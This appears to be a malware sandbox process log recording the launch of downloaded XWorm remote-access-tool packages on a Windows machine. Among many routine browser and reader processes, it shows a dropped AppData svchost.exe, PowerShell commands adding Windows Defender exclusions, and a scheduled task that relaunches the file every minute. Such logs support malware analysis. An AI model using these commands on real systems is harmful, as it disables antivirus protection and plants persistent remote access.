"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=15B5A64AE6FE350026D67382BD5E688A --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=15B5A64AE6FE350026D67382BD5E688A --renderer-client-id=2 --mojo-platform-channel-handle=1776 --allow-no-sandbox-job /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=D38B3C5BF85A9F763E2E1F34D1422946 --mojo-platform-channel-handle=2184 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\Tools\vncviewer.exe
"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\Tools\vncviewer.exe"
C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\Tools\ResHacker.exe
"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\Tools\ResHacker.exe"
C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\Tools\vncviewer.exe
"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\Tools\vncviewer.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9986b3cb8,0x7ff9986b3cc8,0x7ff9986b3cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1924 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2520 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3960 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3252 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4700 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3964 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4912 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3716 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3724 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5396 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=4592 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5664 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5356 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4740 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6424 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6432 /prefetch:1
C:\Users\Admin\Downloads\XWorm-3.1-main\XWorm-3.1-main\XWorm V3.1.exe
"C:\Users\Admin\Downloads\XWorm-3.1-main\XWorm-3.1-main\XWorm V3.1.exe"
C:\Users\Admin\AppData\Roaming\XWorm V3.1.exe
"C:\Users\Admin\AppData\Roaming\XWorm V3.1.exe"
C:\Users\Admin\AppData\Roaming\svchost.exe
"C:\Users\Admin\AppData\Roaming\svchost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004BC 0x00000000000004B8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6792 /prefetch:2
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6016 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5956 /prefetch:1
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5832 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5296 /prefetch:1
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7164 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3496 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5508 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7076 /prefetch:8
C:\Users\Admin\Downloads\XWorm-Remote-Access-Tool-main\XWorm-Remote-Access-Tool-main\XWorm.exe
"C:\Users\Admin\Downloads\XWorm-Remote-Access-Tool-main\XWorm-Remote-Access-Tool-main\XWorm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#nci#>[System.Windows.Forms.MessageBox]::Show('Injection failed! You must run this software as Admin!','','OK','Warning')<#nqz#>;
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\Downloads\XWorm-Remote-Access-Tool-main\XWorm-Remote-Access-Tool-main\XWorm.exe
"C:\Users\Admin\Downloads\XWorm-Remote-Access-Tool-main\XWorm-Remote-Access-Tool-main\XWorm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#nci#>[System.Windows.Forms.MessageBox]::Show('Injection failed! You must run this software as Admin!','','OK','Warning')<#nqz#>;
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7020 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6952 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3784 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1956 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7064 /prefetch:1
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6892 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6900 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5312 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6324 /prefetch:1
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7460 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7540 /prefetch:8
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6128 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6348 /prefetch:1
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8184 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8176 /prefetch:1
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe
"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
